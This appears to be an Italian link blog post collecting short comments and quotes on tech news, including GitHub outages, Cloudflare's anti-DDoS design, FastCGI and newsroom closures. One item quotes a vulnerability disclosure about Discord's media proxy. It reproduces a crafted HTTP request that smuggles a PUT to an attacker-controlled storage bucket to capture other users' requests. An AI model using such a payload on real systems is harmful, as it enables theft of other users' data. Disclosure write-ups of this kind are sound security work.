Note di Matteo

FastCGI: 30 Years Old and Still the Better Protocol for Reverse Proxies. Andrew Ayer di SSLMate spiega in occasione del 30° anniversario di FastCGI come il protocollo sia per certi versi (e almeno in teoria) migliore di HTTP per la comunicazione tra reverse proxy e backend.

FastCGI is very usable today, and has been in production use at SSLMate for over 10 years. That said, using a vintage technology has some downsides. It was never updated to support WebSockets. The tooling is not as good. For example, curl has no way to make requests to a FastCGI server. It supports FTP, Gopher, and even SMTP (however that works), but not FastCGI. When I benchmarked Go's FastCGI server behind a variety of reverse proxies, some workloads had worse throughput compared to HTTP/1.1 or HTTP/2. I don't think that's inherent to the protocol, but a reflection that FastCGI code paths have not been optimized as much as HTTP.

OpenAI spiega (via theverge) che ha dovuto inserire un'istruzione nel prompt di GPT-5.5 in Codex per impedire che nelle risposte comparissero troppo frequentemente riferimenti o battute sui goblin. La spiegazione è che un "tic di stile" della personalità "nerdy" è "uscito" e ha contaminato anche il modello in generale. Mi sembra però indicativo del fatto che non abbiamo ancora idea (e forse non ce l'avremo mai) di come e perché gli LLM funzionano, al di là di tentativi e correzioni continue.

The rewards were applied only in the Nerdy condition, but reinforcement learning does not guarantee that learned behaviors stay neatly scoped to the condition that produced them. Once a style tic is rewarded, later training can spread or reinforce it elsewhere, especially if those outputs are reused in supervised fine-tuning or preference data.

Leggo cose buone su RWX, nuova piattaforma di CI/CD pensata per velocizzare i processi nell'era dell'AI engineering, con parallelizzazione automatica, esecuzione delle pipeline prima del commit e altre ottimizzazioni.

Big tech, dipendenze e tribunali. Lungo, interessante e documentato articolo sui punti di vista attuali della scienza sugli effetti dei social network sulla salute mentale. La conclusione che inaspettatamente si sta confermando con gli studi più recenti è che l'effetto negativo sulla salute mentale non è dovuto ai social perché gli effetti misurati sono solitamente minimi:

Viviamo in una condizione di stress persistente — lavorativo, economico, esistenziale — che il capitalismo contemporaneo produce quotidianamente e per la quale cerchiamo sollievo momentaneo nello scrolling, esattamente come le generazioni precedenti cercavano sollievo nella televisione spazzatura. Il design della piattaforma conta, certo, ma conta meno delle condizioni materiali di vita. E riconoscerlo significherebbe spostare il bersaglio dalle scelte di design di Zuckerberg alle scelte politiche che rendono le nostre vite così stressanti da farci desiderare la fuga. Ma questo, evidentemente, è un discorso che non conviene a nessuno — né alle piattaforme, né ai loro accusatori.

Questa tesi è contraria a quella dominante nell'ultimo decennio, oggetto di molti libri e documentari (es. The Social Dilemma) e della recente sentenza negli USA, secondo cui il problema sia invece il design dei social studiati per creare questa forma di dipendenza. Sarà proprio per questo motivo che a primo impatto questa teoria sembra ben poco convincente. Eppure gli effetti del TikTok di turno sull'attenzione a me sembrano palesi e quindi mi sembra strida un po' con la realtà che vediamo attorno.

Contento però di aver sentito questo recap del punto di vista scientifico. Food for thought.

Alessio Butti, mentre consolida l'uso del sito del dipartimento per la trasformazione digitale come megafono per diffondere praticamente solo le sue frequenti interviste in cui ripete sempre le stesse cose, ora dice, parlando di connettività in fibra:

Rimediamo ai disastri ereditati dagli altri governi

Insomma è sempre colpa di quella di prima, anche dopo una legislatura intera. Anche quando quelli prima erano loro stessi (governo Draghi, sostenuto anche dalla destra).

Anche quando il nuovo bando di gara che dovrebbe risolvere i problemi ha non solo gli stessi difetti dei precedenti, ma ne ha pure di nuovi e incomprensibili. Ma tanto non sarà sua responsabilità difendere i risultati.

A proposito della vicenda di cronaca nera che partendo dalle mie parti si è diffusa in tutta Italia è impossibile non notare il solito cortocircuito. Prima i media diffondono particolari macabri e inquietanti, virgolettati attribuiti all’ambulanziere sospettato degli omicidi di anziani pazienti, “prove” che non solo suggeriscono la colpevolezza dell’imputato ma ne disegnano i tratti di morbosa anomalia e che inevitabilmente coinvolgono molto delle persone intorno a lui, e poi, quando l’effetto atteso di una vasta indignazione (e di pagine viste e copie vendute) è stato ottenuto, iniziano a produrre la seconda onda: articoli sugli effetti a cascata che l’indignazione social ha prodotto sulle persone vicine all’imputato, quelle stesse persone che gli stessi media avevano ampiamente coinvolto. Come se le minacce social non fossero l’effetto inevitabile del cattivo giornalismo e delle sue intenzionali attenzioni ai particolari più inquietanti. Come ogni volta ciò che i media producono non è solo cattiva informazione ma anche una lesione ampia del senso di comunità. Cattiveria indotta come modello economico residuo che ha come effetto principale quello di mettere i cittadini gli uni contro gli altri.

Massimo Mantellini in Giornalismo come lesione.

Chiude Tiscali News dopo lo spezzettamento di quel poco è rimasto di Tiscali, a 28 anni dalla fondazione.

Il prossimo 30 aprile, come riportato dall'Ansa, cesseranno ufficialmente le pubblicazioni di Tiscali News, il portale d'informazione nato alla fine degli anni Novanta. [...] La chiusura coinvolge dodici giornalisti. Secondo quanto ricostruito da Adnkronos, la prospettiva per la redazione è l'uscita dal perimetro aziendale: dieci professionisti hanno già optato per l'esodo incentivato, lasciando l'azienda dal 5 maggio, mentre per i restanti due si prospetta la cassa integrazione.

Il piano di ristrutturazione di Tesselis poggia sulla cessione del ramo B2C (consumer), che comprende i servizi web, la mail e i marchi. L'acquirente individuato è Canarbino Spa, gruppo attivo nel settore energetico, la cui offerta è attualmente oggetto di una procedura competitiva che scadrà proprio il 30 aprile.

Incredibile la crescita di GitHub recente. La quantità di codice scritta non è probabilmente mai stata così alta.

This exponential growth does not stress one system at a time. A pull request can touch Git storage, mergeability checks, branch protection, GitHub Actions, search, notifications, permissions, webhooks, APIs, background jobs, caches, and databases. At high scale, small inefficiencies compound: queues deepen, cache misses become database load, indexes fall behind, retries amplify traffic, and one slow dependency can affect several product experiences.

Our priorities are clear: availability first, then capacity, then new features. We are reducing unnecessary work, improving caching, isolating critical services, removing single points of failure, and moving performance-sensitive paths into systems designed for these workloads. This is distributed systems work: reducing hidden coupling, limiting blast radius, and making GitHub degrade gracefully when one subsystem is under pressure. We’re making progress quickly, but these incidents are examples of where there’s still work to do.

Un esito frequente delle richieste di pubblicazione di open data (come previsto dalla legge) è l'assenza di risposta da parte dell'amministrazione pubblica interpellata. È successo anche in questo caso segnalato da onData in merito ai dati statistici sulle firme per i referendum:

I dati che presentiamo in questa newsletter li abbiamo estratti noi. Ma quei dati dovrebbero già essere pubblici. È stato richiesto formalmente.

Il 10 dicembre 2025 l’associazione onData ha inviato al Ministero della Giustizia — tramite PEC — una richiesta di pubblicazione in formato aperto dei dati sulle raccolte firme, ai sensi dell’art. 5 del D.Lgs. 36/2006 (Riutilizzo dell’informazione del settore pubblico). Non una richiesta di accesso documentale per uso privato: una richiesta di rendere i dati disponibili a tutta la collettività, con licenza aperta e in formato leggibile meccanicamente.

Il Ministero non ha risposto.

L’11 gennaio 2026 onData ha presentato ricorso alla Commissione per l’accesso ai documenti amministrativi. Il 18 febbraio ha segnalato l’inadempimento anche al Difensore civico per il digitale (AgID), organo deputato a vigilare sull’apertura dei dati pubblici.

Il 31 marzo 2026 la Commissione si è pronunciata (decisione n. 3.110). La risposta è tecnica ma significativa: la Commissione ha dichiarato la propria incompetenza, non perché la richiesta di onData fosse sbagliata, ma perché il silenzio del Ministero — in materia di riutilizzo dei dati — non equivale a un diniego. Si tratta di un “silenzio-inadempimento”, non di un “silenzio-rifiuto”: una distinzione sottile ma decisiva, che sposta il rimedio possibile dal ricorso alla Commissione al ricorso al Tribunale Amministrativo Regionale (TAR), ai sensi dell’art. 117 del Codice del processo amministrativo.

Vale la pena di notare un dettaglio: nella sua relazione tecnica, il Ministero ha riconosciuto che pubblicare i dati sarebbe fattibile — ma non ha mai adottato un provvedimento formale, né in senso positivo né negativo. Il silenzio continua.

onData è ancora in attesa della risposta del Difensore civico per il digitale, ma nel frattempo i dati continuano a non essere pubblici.

Questo elenco di "fit" di un candidato in un'azienda è molto interessante. È quasi un framework per definire che cosa ci si aspetta da un ambiente di lavoro:

Independence vs. Collaboration: This covers both how you work and how you make decisions. Some companies need people who pick up a problem, run with it, and come back with a solution. Others expect you to bring the team along at every step. These often go together: companies that want you to work solo also tend to want you to make calls on your own, and companies that want collaborative work also want group buy-in on decisions.

If every story you tell involves going off and building something alone, consensus-driven companies will worry you’ll steamroll people or make choices that won’t stick. Flip it around: if every story involves checking with the group before you act, companies that prize individual ownership will wonder whether you can make a decision without a meeting.

Speed vs. Thoroughness: Startups often need rapid experimentation, where you ship MVPs and iterate based on feedback, while companies in healthcare or finance require careful validation before any release. This tension also shows up in how teams think about code quality: some organizations will happily spend extra weeks on clean architecture, while others want a working solution on deadline even if the code needs cleanup later. Whereas stories about methodical testing might bore a startup, your “ship it and fix it” examples could terrify a medical device company.

Excellence vs. Pragmatism: Some organizations value technical excellence and clean architecture above all else. Others need pragmatic solutions that ship on deadline even if imperfect. Focusing on perfect code fails at deadline-driven companies, just as accepting technical debt everywhere fails at companies maintaining critical infrastructure.

Innovation vs. Stability: Some roles require creating new solutions and challenging existing approaches, while others need you to maintain and optimize proven systems. If you say that you’re constantly reinventing established processes, teams that value stability will not consider you a good fit. Conversely, stories that show you only follow existing patterns will disappoint teams that are looking for creative problem-solving

Direct vs. Diplomatic: Some cultures prize radical candor and want you to say exactly what you think. Others value maintaining harmony and face-saving communication. If you are too blunt, you will not fit in well at a relationship-focused company. If you are not direct enough, you will not like working at a company that values “disagree and commit.”

Data vs. Intuition: Some companies require data to justify every decision (”data-driven” cultures), while others trust experienced judgment and move on gut feel. Showing that you make decisions based on instinct does not impress analytical companies, and telling a company that values experienced judgment that you conduct three A/B tests to choose a button color will get you struck off their list.

Specialist vs. Generalist: Large companies often want deep experts who master one domain, while smaller companies need people who are comfortable wearing multiple hats. Know which sort of company you are walking into.

(Learnings from conducting ~1,000 interviews at Amazon)

Ennesima horror story con GoDaddy in GoDaddy Gave a Domain to a Stranger Without Any Documentation. Una lista di altre horror story in questo post.

Il system prompt del nuovo AI playlist generator di Spotify (non c'è in Italia):

USB Cheat Sheet. Visto che gli standard USB sono confusionari e le cose cambiano nome ogni tanto.

È di gennaio quindi forse non aggiornato ma questi sono i limiti presunti dei piani in abbonamento di Claude:

Il costo è molto più basso rispetto a usare le API direttamente, anche se va considerato che anche le API hanno probabilmente un grosso margine quindi non è chiaro se il tutto sia sostenibile per Anthropic.

Elizabeth Pemmerl, GitHub’s chief revenue officer, also announced her resignation last week, according to sources at GitHub. “After eleven years on this amazing journey, I have decided it’s the right time for the next chapter,” said Pemmerl in a message to GitHub employees, seen by Notepad. Microsoft has appointed Dan Stein, former head of software and digital platforms for Microsoft Customer and Partner Solutions (MCAPS), as the new chief revenue officer for GitHub. It’s the latest sign of Microsoft’s ownership influence on GitHub.

“There’s basically no more GitHub at all anymore,” one GitHub employee tells me. “It’s all Microsoft, and the company is collapsing, both in outages that are reallllly bad and have torched the company reputation… and in an exodus of leadership.”

Tom Warren in Inside Microsoft’s wave of executive departures

Chi poteva farlo se non Meta?

And when an employee asked if it’s possible to opt out, Meta’s CTO replied that it is not: every US-based engineer will have their keystrokes logged, mouse movements captured, and work tracked.

L'esperienza di Lettermint.co con OVHcloud:

Some incidents were acknowledged late. Some were never clearly acknowledged. Some only appeared on the status page after customers had already been impacted for hours (or even days!).

A few examples (these are the ones we shared with the OVH team):

• Feb 23, 2025: unable to create nodes for a full day (Keystone errors, 500s).
• Mar 26, 2025: node timeouts in GRA11, never properly acknowledged.
• Apr 8, 2025: BYOIP issue where Microsoft services were unreachable.
• Apr 11, 2025: major production incident, multiple nodes down. Support replied 11 days later.
• Apr–May 2025: recurring DNS issues (even domains like Stripe intermittently failed to resolve).
• Aug 27, 2025: unannounced cluster updates → replication issues → data corruption → restore from backup.
• Sep 2, 2025: ~2.5 hours downtime across the entire region due to Keystone (an OpenStack service they use).
• Sep 10, 2025: another outage (~30+ minutes).
• Oct 2025: CEPH/block storage instability and Kubernetes API issues.
• Nov 2025 onward (3-AZ Paris): Object Storage problems begin.
• Dec 2025 – Apr 2026: repeated S3 timeouts and 503s for months.
• Feb 5, 2026: OVHcloud restarted all nodes at once (PDB ignored).
• Mar 5, 2026: similar issue again.

La mia esperienza media con Codex, che lo rende per me inusabile:

Un tizio ha studiato l'over-editing dei modelli linguistici e in effetti i modelli GPT sono quelli che tendono ad aggiungere più complessità.

C'è un nuovo modello open di OpenAI:

Privacy Filter is a small model with frontier personal data detection capability. It is designed for high-throughput privacy workflows, and is able to perform context-aware detection of PII in unstructured text. It can run locally, which means that PII can be masked or redacted without leaving your machine. It processes long inputs efficiently, making redaction decisions in a quick, single pass.

Dimensione da 1,5 miliardi di parametri di cui 50 milioni attivi. Disponibile su Hugging Face con licenza Apache 2.0 (quindi anche uso commerciale).

"Autorizzazione all'ingresso per cure in Italia di cittadini extracomunitari" e la procedura richiede di inviare una PEC.

E poi: il servizio è gratuito, ma il pagamento va fatto con PagoPA.

Straordinario.

Interessante startup USA, Impulse, che ha sviluppato un piano a induzione con manopole magnetiche e batteria, per poter raggiungere potenze fino a 10 kW (l'acqua bolle in 40 secondi).

Costa 7.000 dollari. La tecnologia è fornita in licenza anche ad altri produttori. Il primo fuori dagli USA è italiano: BS Service Group produrrà in Italia il modello Eximius con tecnologia Impulse.

Imagine if this is as good as AI gets. If this is where it stops, you'd still have models that can almost code a web browser, almost code a compiler—and can even present a pretty cool demo if allowed to take a few shortcuts. You'd still get models that can kinda-sorta simulate worlds and write kinda-sorta engaging stories. You'd still get self-driving cars that almost work, except when they don't. You get AI that can make you like 90% of a thing!

90% is a lot. Will you care about the last 10%?

I'm terrified that you won't.

I'm terrified of the good enough to ship—and I'm terrified of nobody else caring. I'm less afraid of AI agents writing apps that they will never experience than I am of the AI herders who won't care enough to actually learn what they ship. And I sure as hell am afraid of the people who will experience the slop and will be fine with it.

[...]

I'm terrified that our craft will die, and nobody will even care to mourn it.

Dima Konev, software engineer, in (AI) Slop Terrifies Me.

Un tizio ha installato tutte le estensioni esistenti per Firefox, circa 84mila. Funziona! Ma richiede 32 GB di RAM e un po' di pazienza (la pagina estensioni richiede 6 ore per caricarsi).

Il modo di parlare fastidiossissimo e innaturale delle AI è diventato misurabile:

Ci laviamo la coscienza con la modulistica per non prenderci la responsabilità di cambiare davvero.

Carlotta Silvestrini

HTTP desync in Discord's media proxy. Vulnerabilità interessante nel proxy di Discord verso il bucket Google Cloud Storage:

I sent the following request to the media proxy:

GET /attachments/%20HTTP/1.1%0AHost:x%0A%0APUT%20/request.txt%20HTTP/1.1%0AHost:myevilbucket.storage.googleapis.com%0AContent-Length:250%0A%0A HTTP/1.1
Host: media.discordapp.net

Which caused the backend to send out these two requests to GCP:

GET /attachments/ HTTP/1.1
Host:x

PUT /request.txt HTTP/1.1
Host:myevilbucket.storage.googleapis.com
Content-Length:250

 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.6; rv:92.0) Gecko/20100101 Firefox/92.0
Host: discord.storage.googleapis.com

The PUT request expected 250 bytes of data but only ~150 bytes were given, meaning that the deficit would be eaten from whatever gets written to the stream next, i.e., the next borrower’s request.

And sure enough when I checked a moment later, my request.txt had an attachment link in it I’ve never seen before: [...]

It feels to me that a good part of the industry is using token count numbers similarly to how the lines-of-code-produced metric was used years ago. There was a time when the number of lines written daily or monthly was an important metric in programmer productivity, until it became clear that it’s a terrible thing to focus on. A lines-of-code metric can easily be gamed by writing boilerplate or throwaway code. Also, the best developers are not necessarily those who write the most code; they’re the ones who solve hard problems for the business quickly and reliably with – or without – code!

Similarly, the number of tokens a dev generates can easily be gamed, and if this metric is measured then devs will indeed game it. But doing so generates a massive accompanying AI bill!

Gergely Orosz in The Pulse: ‘Tokenmaxxing’ as a weird new trend.

The Human Infrastructure: How Netflix Built the Operations Layer Behind Live at Scale. Un po' di backstage della nuova linea di business di Netflix: gli eventi live.

Duolingo's Kubernetes Leap. Non l'ho visto, ma qui Duolingo spiega la migrazione da AWS ECS a EKS.

To give you an idea of the scale that we're looking at, Duolingo currently has over 128 million monthly active users, and we have over 250 courses that you can learn on the app. [...] On the engineering side, we have over 400 engineers and more than 500 backend services, just to give you an idea of the scale of this migration that we're going to be looking at today.

Previously, the 500-plus backend services that I mentioned at the beginning are running on AWS ECS. We have some workloads that are running on different infrastructure, but for the mass majority, they're on ECS. That's what I'm going to be focusing on. We're going to be moving from ECS to EKS. ECS is AWS's container orchestration solution. It's a managed solution. It's very simple and straightforward to use. We've been actually super happy with ECS over the past year, and it served our needs very well. Now as we've grown to a much bigger scale, as I mentioned, Kubernetes just offers a much more feature-rich ecosystem and open-source platform, as well as specific features that ECS does not give us.

Healthchecks.io Now Uses Self-hosted Object Storage. Il maestro del self-hosting ora self-hosta anche uno storage S3-compatible, basato sul file system:

Versity S3 Gateway turns your local filesystem into an S3 server. An S3 PutObject operation creates a regular file on the filesystem, an S3 GetObject operation reads a regular file from the filesystem, and an S3 DeleteObject operation deletes a file from the filesystem. It does not need a separate database for metadata storage. You can use any backup tool to take backups. The upgrade procedure is: replace a single binary and restart a systemd service. It is written in Go, and is being actively developed. The one bug I found and reported was fixed in just a few days.

Il tradeoff è l'assenza di HA e replicazione:

With this setup, if both drives on the object storage server fail at the same time, the system could lose up to 2 hours of not yet backed-up ping request bodies. This can be improved, as usual, with the cost of extra complexity.

E costa di più:

The costs have increased: renting an additional dedicated server costs more than storing ~100GB at a managed object storage service. But the improved performance and reliability are worth it.

Oh, chiude Wired Italia. Unprofitable, a differenza delle altre edizioni in altri Paesi dove la strategia si è spostata dall'occuparsi solo di tecnologia a temi più politici, con successo di abbonamenti.

Aggiornamento: non lo sapevano nemmeno loro. Dal Post:

Nel 2015 la redazione era già stata dimezzata, da 12 a 6 giornalisti, sempre per la necessità di ridurre i costi e rimettere in ordine i conti: anche all’epoca le pubblicazioni erano state interrotte prima di riprendere a cadenza trimestrale dopo la riorganizzazione della redazione. Oggi la redazione è composta dal direttore, da tre giornalisti, cinque grafici, tre collaboratori fissi e molti giornalisti collaboratori occasionali.

Fonti di Condé Nast Italia che hanno chiesto di rimanere anonime hanno detto che l’azienda ha comunicato la chiusura alla redazione dieci minuti prima di pubblicare il comunicato online. Sostengono inoltre che i dati citati dall’azienda non abbiano fondamento e che nelle ultime settimane non ci fosse stata nessuna avvisaglia di possibili ridimensionamenti o addirittura rischi di chiusura. L’azienda non ha comunicato quando si interromperanno le pubblicazioni né come intende gestire l’eventuale uscita o il ricollocamento dei giornalisti e dei grafici: per ora rallenterà la frequenza di pubblicazione degli articoli sul sito internet, ma non è ancora chiaro da quando non sarà più aggiornato.

Oltre al sito e alla rivista, negli ultimi anni Wired Italia ha organizzato diversi festival come il Wired Next Fest. Lynch ha detto che Wired continuerà a organizzare eventi in Europa, gestiti dal Regno Unito, ma anche in questo caso non è ancora chiaro come.

Penso uno dei design più confusionari che ho mai visto in un'app ("TO Move"):

I tre tipi di software engineer secondo The Pragmatic Engineer:

• Builders: those who care about quality, good architecture, following good coding practices, and who talk about the craft of software engineering, etc.

• Shippers: those who primarily focus on outcomes for a product, features, testing, and experimenting with users. A fair number of leaders, managers, and engineers who were more hands-off with coding before AI tools are in this category, as are product engineers.

• Coasters: engineers who are not considered particularly good or great engineers, but they get the work done. They often do this without much taste or concern for quality, and seem to be mostly coasting along and doing what they’re told.

Con l'AI, queste categorie restano ma con diversi livelli di entusiasmo e pro/contro. Il resto nell'articolo.

Il Times scrive meno articoli e, sorpresa, il traffico aumenta:

[...] i risultati esposti dalla responsabile del digitale del Times, storico quotidiano e sito di news britannico. Anna Sbuttoni ha detto al sito Press Gazette che il giornale avrebbe ridotto il numero di articoli pubblicati del 25% (da 200 a 150 al giorno, in media) senza che questo abbia diminuito il traffico sul sito, che anzi sarebbe aumentato nell'ultimo mese del 13% e addirittura del 29% sull'anno prima.

Secondo Sbuttoni la diminuzione della quantità si sta accompagnando a un lavoro sulla qualità fatto da cinque criteri: scrivere più articoli che non si trovano altrove; raccontare, per le storie coperte anche da altri, cose che non si trovano altrove; seguire le storie in corso, usando molto i live blog; usare i dati per dare concretezza e interesse agli articoli e rimuovere tutto il testo inutile; titolare e presentare gli articoli in modo che i lettori sappiano "perché dovrebbero cliccare".

How the economics of multitenancy work. Blacksmith spiega come un cloud CI con workload variabili e con molti spike diventa economicamente sostenibile con l'aumentare dei clienti:

Over time, CI jobs start behaving like a Poisson process — random, short bursts spread out across time. From a distance, what once looked like sharp spikes from individual customers smooths into a predictable pattern. The more customers we serve, the less intense each individual spike appears. In short: the more chaotic it gets, the better it is for our business.

[...]

Basically, our revenue scales with the average utilization of the fleet. There’s a direct link between utilization and gross margins, and it’s not linear.

• At 10% utilization, we’re already hitting around 35% gross margins.
• At 20% utilization, margins jump to about 70%.
• At 35% utilization, we’re flirting with 85%+ gross margins.

Keeping a Postgres queue healthy. Il titolo nasconde un approfondimento sul funzionamento del vaccum in relazione alle tuple eliminate in PostgreSQL.

Space Kangaroo su YouTube mi fa sempre ridere, prende cose che le AI non sanno fare e i risultati sono assurdi. Il montaggio è stupendo. L'ultimo è Google Gemini tries to play Minesweeper.

Improving storage efficiency in Magic Pocket, our immutable blob store. Dropbox spiega come funziona il suo sistema di storage per i dati degli utenti, e come un bug ha portato ad avere volumi di storage usati solo in piccola parte e come poi sono stati "ricompattati".

Magic Pocket is the core Dropbox storage system—a custom-built, exabyte-scale blob storage system designed for durability, availability, scale, and efficiency. It holds user content, which means it must be safe, fast, and cost-effective to scale with the company. For Dropbox, storage efficiency really matters. We measure it by looking at how much total disk space we use compared to how much user data we’re actually storing.

L'architettura anti-DDoS di Cloudflare:

Here is what actually happens when an attack hits our network. Packets arrive at the network interface card (NIC) and immediately enter an eXpress Data Path (XDP) program chain managed by xdpd, running in driver mode. Among the first programs in that chain is l4drop, which evaluates each packet against mitigation rules in extended Berkeley Packet Filter (eBPF). Those rules are generated by dosd, our denial of service daemon, which runs on every server in our fleet. Each dosd instance samples incoming traffic, builds a table of the heaviest hitters it sees, and broadcasts that table to every other instance in the colo. The result is a shared colo-wide view of traffic, and because every server works from the same data, they reach the same mitigation decision.

When dosd detects an attack pattern, the resulting rule is applied locally via l4drop and propagates globally via Quicksilver, our distributed key-value (KV) store, reaching every server in every data center within seconds. Only after surviving l4drop do packets reach Unimog, our Layer 4 (L4) load balancer, which distributes them across healthy servers in the data center. For Magic Transit customers routing enterprise network traffic through our edge, flowtrackd adds a further layer of stateful TCP inspection, tracking connection state and dropping packets that don't belong to legitimate flows.

The 31.4 Tbps attack we mitigated followed exactly this path. No traffic was backhauled to a centralized scrubbing center. No human intervened. Every server in the targeted data centers independently recognized the attack and began dropping malicious packets at line rate, before those packets consumed a single CPU cycle of application processing. The software is only half the story: none of it works if the ports aren't there to absorb the traffic in the first place.

La chiave alla fine è l'ultima frase: devi prima avere la capacità di rete, motivo per cui è ormai estremamente difficile che nascano nuove aziende nel settore che facciano il percorso di startup che ha fatto Cloudflare (il traffico Internet di oggi non è quello del 2010).

Firn is a high-performance, multi-tenant vector and full-text search engine backed by object storage (S3 / MinIO / R2 / GCS). It is designed as a credible open-source alternative to turbopuffer, proving that a professional-grade tiered storage architecture (RAM → NVMe → S3) is achievable entirely from open-source components. The cost efficiency of S3 with the speed of local RAM. A multi-tenant vector and full-text search engine backed by S3. Built with LanceDB and Foyer for microsecond-scale search latency on top of object storage.

Two Years of Valkey. Un'analisi dell'attività git di Redis e il suo fork Valkey negli ultimi due anni. In breve, Valkey, se la cava meglio del previsto, con elevata attività nelle repository in buona parte grazie al contributo di Amazon, Tencent, Ericsson e altre grandi aziende:

Qua il contesto:

Two years ago last month, a group of former contributors to the Redis project announced their intention to collaborate instead on a competitive fork. Triggered by the decision to shift Redis away from the permissive open source BSD license to source available alternatives – the Redis Source Available License (RSALv2) and Server Side Public License (SSPLv1) – the new fork, Valkey, attracted attention without recent precedent. A lot has happened since, including the return to the project of its original author and the decision by Redis a little over a year after the relicensing to return to an open source license, albeit the copyleft AGPL rather than the more permissive, original BSD. Given the two year anniversary, it’s worth taking stock of the two projects via their commit metrics. This is only one facet of the project’s health, obviously, and does not reflect usage, but as forks typically enter a decline phase shortly after their inception, comparing the two projects contributions should be a useful exercise.

Le stacked PR su GitHub sono in preview:

Arrange pull requests in an ordered stack and merge them all in one click. Each PR represents one focused layer of your change, reviewed independently and landed together.

The gh stack CLI makes it easy to create stacks, perform cascading rebases, push branches and create PRs, and navigate between layers — all from your terminal.

Alexa che ritiene che S. Luigi IX sia il 12 aprile (è il 25 agosto):

Gemini che sostiene che il 12 aprile sia Pasqua anche per i cattolici in Italia, inventadosi regole inesistenti per giustificare la data:

(Gemini Flash, I know.)

Come sta Satispay dopo aver raccolto mezzo miliardo? Giulio Michelon riassume la storia di Satispay, che è on track per diventare profitable dopo un decennio e mezzo miliardo di investimenti, in grossa parte grazie alle nuove feature di welfare aziendale (buoni pasto e acquisto).

E’ nata la risposta Europea sulla guida autonoma: @niulinx

Dopo molti mesi di lavoro è iniziata la più difficile sfida professionale della mia vita.

38M€ per il primo round, @gruppo_a2a e il fondo AI di CDP Cassa Depositi e Prestiti come lead investors e con il contributo fondamentale di un parterre di investitori come: AFL (Famiglia Falck), @fsitaliane , @Pirelli , VC Partners SGR, MOST, Fondazione ICO Falck, @EmilioFrazzoli , Stefano Bernardi

Niulinx è uno spinoff del @polimi dal gruppo di ricerca AIDA del Prof. @sergiosavaresi

Il Team

Io sono il CEO, Cristiano Bonetti il CTO e Gian Marco Felice il CFO e Presidente del Board.

12 Fondatori e oltre 60 tra PhD, Ingegneri elettronici, meccanici, nucleari, matematici, informatici e Fisici. L’età media delle persone che vi lavorano è 27 anni.

Un comitato tecnico di assoluta eccellenza presieduto dal Prof. Sergio Savaresi

Cosa fa Niulinx

Niulinx sviluppa l’intero sistema tecnologico che rende possibile la guida autonoma: dalla percezione dell’ambiente alla pianificazione del percorso, dal controllo del veicolo alla gestione remota della flotta.

I nostri obiettivi sono:

1-Omologare automobili a guida autonoma in Europa entro 3 anni per erogare un servizio su flotte condivise 2-Creare una istituzione Europea con massa critica di ingegneri capaci di sviluppare in Europa la tecnologia sulla guida autonoma in tutti i suoi casi d’uso rilevanti

Perché ora, perché l’Europa

Il mercato globale della guida autonoma vale oggi oltre 50 miliardi di dollari e si prevede superi i 300 miliardi entro il 2035. Mentre Stati Uniti e Cina hanno diversi players l’Europa non ha ancora un campione continentale. Niulinx nasce per colmare questo vuoto: non replicando il modello americano, ma costruendo un approccio industriale europeo – regulatory-first, capital-efficient, e progettato per scalare attraverso un modello di franchising con operatori locali.

Una coalizione industriale senza precedenti

La compagine degli investitori rappresenta una convergenza unica dell’industria italiana della mobilità, dell’energia e delle infrastrutture: A2A – primo investimento diretto di A2A Life Ventures, braccio di innovazione del Gruppo, nella strategia di Corporate Venture Capital per la mobilità autonoma e sostenibile. CDP Venture Capital – partecipa attraverso il Fondo Artificial Intelligence AFL, Ferrovie dello Stato Italiane, Pirelli, VC Partners SGR con il fondo VC Partners Fund I, MOST, Fondazione ICO Falck – completano il round con competenze nell’energia, nei materiali avanzati, nelle infrastrutture di trasporto, nel venture capital e nella ricerca sulla mobilità sostenibile. A questi si aggiungono Emilio Frazzoli (già CTO di nuTonomy/Motional, oggi Professore all’ETH di Zurigo) e Stefano Bernardi, investitori individuali di profilo internazionale.

Siamo salpati, vediamo ora dove ci porterà la nostra determinazione e capacità mentre navighiamo in un mondo complesso

Luca Foresti, CEO di Niulinx in un tweet.

Un altro caso di AI che sta al gioco e (forse) contribuisce a portare una persona al suicidio, questa volta con Gemini, che mostra tutti i limiti degli LLM che ogni tanto deragliano e dicono cose assurde.

Come sono distribuiti gli 80 Tbps di traffico di CDN77:

• 31% – Private Network Interconnections
• 28% – Internal backbone traffic between PoPs
• 23% – Tier 1 IP transit providers
• 12% – Cache appliances inside ISPs
• 6% – Internet Exchanges

Type split:

• 29% – Public internet (Tier 1 + IXPs)
• 71% – Private network (PNIs, backbone, caches)

Cogito.md è un nuovo editor Markdown nativo per macOS, fatto da Fabrizio Rinaldi.

Interessante anche Tolaria.md (lancio a breve):

Tailscale cambia i prezzi, semplificando i piani, e la cosa più interessante mi sembra che Tailscale SSH sia ora disponibile su tutti i piani (anche quello gratuito).

Qualche prova concreta della scarsa qualità del nuovo Twitter, scrive Nate Silver:

I recently came across a bubble chart depicting the Twitter accounts that had received the most “engagement” in February 2026. It was depressing: most of the top accounts were extremely low-quality and highly partisan. I hadn’t even heard of many of them and only follow a handful of the top accounts. So I tracked down the original data myself and, with help from Claude, made my own improved version of the chart. Here, voilà, are the Twitter accounts with the most engagement so far in 2026:

It’s not hard to notice that Twitter has become extremely right-leaning. But I’d argue there’s an equally important trend: the top accounts are of incredibly low quality. Elon, with the algorithmic boost he built in for himself, is at the eye of the storm, of course. [...]

Amazon dismette Workmail, il servizio di posta elettronica per aziende, mentre Apple lancia Apple Business, che include la posta elettronica, apparentemente gratis.

Su Amazon, ultimamente sembra che AWS stia un po' venendo meno alla sua storica affidabilità in termini di supporto a lungo termine dei servizi. Di recente ha annunciato che "chiuderà" in totale 14 servizi, tra cui App Runner che doveva competere con gli altri PaaS moderni e Google Cloud Run.

Il nostro intero sapere sul mondo è pieno di circolarità. Le parole della lingua si definiscono l'un l'altra nei dizionari, noi impariamo gli uni dagli altri, gli esperimenti informano la teoria ma li comprendiamo usando le nostre teorie. L'immagine manifesta del mondo, costituita di cose come sedie e alberi, è giustificata da un'immagine scientifica del mondo, costituita di atomi e campi; ma atomi e campi li comprendiamo a partire dai nostri strumenti di misura, che fanno parte dell'immagine manifesta. E così via. Viviamo in cerchi.

Carlo Rovelli in Sull'eguaglianza di tutte le cose.

